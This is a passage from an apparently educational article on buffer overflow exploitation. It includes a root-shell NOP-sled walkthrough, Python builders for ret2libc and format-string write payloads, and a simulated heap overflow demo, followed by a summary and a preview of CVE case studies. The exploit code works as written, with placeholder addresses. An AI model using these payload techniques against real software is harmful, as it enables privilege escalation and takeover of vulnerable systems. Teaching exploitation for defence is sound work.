When the program returns from the copy function, it jumps to the address we set, 0xffffdcf0
This address points to the NOP sled area, and the processor executes a series of NOP instructions
After "sliding" to the shellcode area, our malicious code begins to execute
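The shellcode calls setuid(0) and then execve("//bin/sh")
The resulting shell runs as root. Because setuid(0) only succeeds for an already privileged process, this outcome depends on vul being a setuid-root binary or, as the root prompt in the ASLR step suggests, on the session itself running as root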

Extended Exploitation Techniques

Besides basic stack overflow exploitation, several advanced attack techniques are worth studying:

ROP (Return-Oriented Programming) Attack

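When the stack is non-executable, injected shellcode cannot run, but ROP can chain existing code snippets (gadgets) that are already mapped as executable. The listing below builds the simplest variant, a ret2libc call chain: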

python
#!/usr/bin/python3
# rop_exploit.py - ROP chain attack example

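import struct
import sys

class ROPGadget:
    """ROP gadget management class"""
    def __init__(self):
        # Useful gadgets found in the program or library (illustrative addresses)
        self.gadgets = {
            'pop_eax_ret': 0x080483d1,      # pop eax; ret
            'pop_ebx_ret': 0x080483d2,      # pop ebx; ret  
            'pop_ecx_ret': 0x080483d3,      # pop ecx; ret
            'pop_edx_ret': 0x080483d4,      # pop edx; ret
            'int_0x80': 0x080483d5,         # int 0x80; ret
            'xor_eax_ret': 0x080483d6,      # xor eax, eax; ret
            'bin_sh_addr': 0x080484a0,      # "/bin/sh" string address
        }

class Ret2LibcExploit:
    """ret2libc payload builder"""
    def calculate_addresses(self):
        """Return the libc addresses the call chain needs.

        Placeholder values only: the real addresses depend on the target's
        libc build and load address and must be resolved on the target.
        """
        return {
            'system': 0x11111111,   # placeholder for system()
            'exit':   0x22222222,   # placeholder for exit()
            'bin_sh': 0x33333333,   # placeholder for a "/bin/sh" string
        }

    def build_payload(self):
        """Construct ret2libc attack payload"""
        addrs = self.calculate_addresses()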
        
        # Buffer padding
        padding = b'A' * 112
        
        # Construct call chain: system("/bin/sh"); exit(0);
        payload = padding
        payload += struct.pack('<I', addrs['system'])   # Return to system()
        payload += struct.pack('<I', addrs['exit'])     # Call exit() after system returns
        payload += struct.pack('<I', addrs['bin_sh'])   # Parameter "/bin/sh" for system()
        
        return payload

# Address leakage helper function
def leak_libc_address():
    """
    In actual attacks, libc address needs to be leaked first
    This is for demonstration purposes only
    """
    # Example: Leak address through format string vulnerability
    format_string_payload = b"AAAA" + b"%p " * 20
    return format_string_payload

# Usage example
exploit = Ret2LibcExploit()
payload = exploit.build_payload()

# Write the status line to stderr so it does not mix with the payload on stdout
print(f"ret2libc payload length: {len(payload)} bytes", file=sys.stderr)
sys.stdout.buffer.write(payload)

Heap Overflow Exploitation Example

Basic concepts of heap overflow attacks:

python
#!/usr/bin/python3
# heap_overflow_demo.py - Heap overflow concept demonstration

class HeapChunk:
    """Simulate heap chunk structure"""
    def __init__(self, size, data=b''):
        self.size = size
        self.prev_size = 0
        self.flags = 0
        self.data = data[:size-8]  # Subtract header 8 bytes
        self.fd = 0    # forward pointer
        self.bk = 0    # backward pointer
    
    def __repr__(self):
        return f"Chunk(size={self.size}, data={self.data[:20]}...)"

class HeapManager:
    """Simplified heap manager"""
    def __init__(self):
        self.chunks = []
        self.free_list = []
    
    def malloc(self, size):
        """Allocate memory block"""
        # 8-byte alignment
        aligned_size = (size + 7) & ~7
        chunk = HeapChunk(aligned_size + 8)  # Add header
        self.chunks.append(chunk)
        return len(self.chunks) - 1  # Return block index
    
    def free(self, chunk_id):
        """Free memory block"""
        if 0 <= chunk_id < len(self.chunks):
            chunk = self.chunks[chunk_id]
            self.free_list.append(chunk_id)
            print(f"Free block {chunk_id}: {chunk}")
    
    def write_data(self, chunk_id, data):
        """Write data to block"""
        if 0 <= chunk_id < len(self.chunks):
            chunk = self.chunks[chunk_id]
            if len(data) <= chunk.size - 8:  # Compare against the block's data capacity
                chunk.data = data
                print(f"Safe write to block {chunk_id}")
            else:
                # Overflow situation
                chunk.data = data  # This will overflow to adjacent blocks
                print(f"⚠️ Block {chunk_id} overflow!")
                self.check_corruption()
    
    def check_corruption(self):
        """Check heap corruption"""
        for i, chunk in enumerate(self.chunks):
            if len(chunk.data) > chunk.size - 8:
                print(f"🚨 Detected block {i} data overflow")
                if i + 1 < len(self.chunks):
                    next_chunk = self.chunks[i + 1]
                    print(f"   May affect block {i+1}: {next_chunk}")

# Heap overflow demonstration
def heap_overflow_demo():
    """Demonstrate heap overflow attack"""
    heap = HeapManager()
    
    # Allocate two adjacent blocks
    chunk1 = heap.malloc(32)
    chunk2 = heap.malloc(32)
    
    print(f"Allocated block1 (ID: {chunk1})")
    print(f"Allocated block2 (ID: {chunk2})")
    
    # Normal write
    heap.write_data(chunk1, b"Normal data")
    heap.write_data(chunk2, b"Another block")
    
    print("\n--- Heap Overflow Attack ---")
    # Overflow write, overwrite next block
    overflow_data = b"A" * 50 + b"OVERFLOW_DATA"
    heap.write_data(chunk1, overflow_data)

if __name__ == "__main__":
    heap_overflow_demo()

Format String Attack

Exploiting format string vulnerabilities in printf-like functions:

python
#!/usr/bin/python3
# format_string_exploit.py - Format string attack

def generate_format_string_payload(target_addr, value):
    """
    Generate format string attack payload
    Modify the value at target_addr to value
    """
    # Assumed position of the first address among printf's arguments;
    # this is target-specific and must be found by experiment
    first_arg_index = 8

    # Place the four target addresses (one per byte to write) at the
    # start of the payload. An address containing a null byte would end
    # the string early and cannot be delivered this way.
    payload = b""
    for i in range(4):
        payload += (target_addr + i).to_bytes(4, 'little')

    # %hhn stores the low byte of the number of characters printed so
    # far, so pad the output until that count matches each target byte
    printed = len(payload)
    format_str = ""
    for i, byte_val in enumerate(value.to_bytes(4, 'little')):
        pad = (byte_val - printed) % 256
        if pad:
            format_str += f"%{pad}c"
            printed += pad
        format_str += f"%{first_arg_index + i}$hhn"

    return payload + format_str.encode()

def demo_format_vulnerability():
    """Demonstrate format string vulnerability"""
    print("=== Format String Vulnerability Demo ===")
    
    # Simulate vulnerable C code:
    # char buffer[100];
    # gets(buffer);
    # printf(buffer);  // Dangerous! User input directly as format string
    
    # Information leak payload
    leak_payload = b"AAAA" + b"%p " * 10
    print(f"Information leak payload: {leak_payload}")
    
    # Address write payload
    target_addr = 0x08049680  # Assumed target address
    new_value = 0x41414141    # Value to write
    
    write_payload = generate_format_string_payload(target_addr, new_value)
    print(f"Address write payload length: {len(write_payload)} bytes")
    
    return write_payload

if __name__ == "__main__":
    demo_format_vulnerability()

Summary and Next Article Preview

In this article, we have deeply explored the fundamental principles and practical exploitation techniques of buffer overflow vulnerabilities:

Key Points Review

Basic Principles: In-depth understanding of stack memory layout, function call mechanisms, and stack frame structures
Vulnerability Analysis: Analysis of buffer overflow causes and impacts through specific C code examples
Practical Exploitation:
- Learned how to determine overflow points and construct attack payloads
- Mastered NOP sled techniques and shellcode construction methods
- Understood various attack techniques: ROP, ret2libc, heap overflow, etc.
Debugging Techniques: Using GDB for memory state analysis and vulnerability verification
Advanced Attacks: Format string attacks, reverse connection shellcode, and other extended techniques

Practical Skills Gained

After working through this article, readers should be able to:

Identify potential buffer overflow vulnerabilities in C/C++ code
Use debugging tools to analyze memory layout and execution flow
Construct basic buffer overflow attack payloads
Understand how modern attack techniques evolved

Next Article Preview: Modern Protection and Real-World Cases

In the next article, we will explore in depth:

Modern Protection Mechanisms

CISA security guidance and enterprise-level protection practices
Stack protection, ASLR, DEP and other protection technologies and their bypass methods
Secure programming practices and code audit techniques

Real CVE Vulnerability Cases

CVE-2024-38812 (VMware vCenter Server heap overflow)
CVE-2022-0185 (Linux kernel privilege escalation)
CVE-2023-6549 (Citrix NetScaler DoS)
CVE-2024-28219 (Pillow library strcpy overflow)

Vulnerability Detection and Emergency Response

Automated vulnerability scanning and code audit tools
Enterprise emergency response processes and best practices
Continuous security monitoring and threat intelligence integration

Modern Language Security Comparison

How Go avoids buffer overflows by design
Memory-safe programming language feature analysis

The next article will combine real CVE cases to demonstrate the actual threats of buffer overflow vulnerabilities in modern environments and provide comprehensive protection strategies. Stay tuned!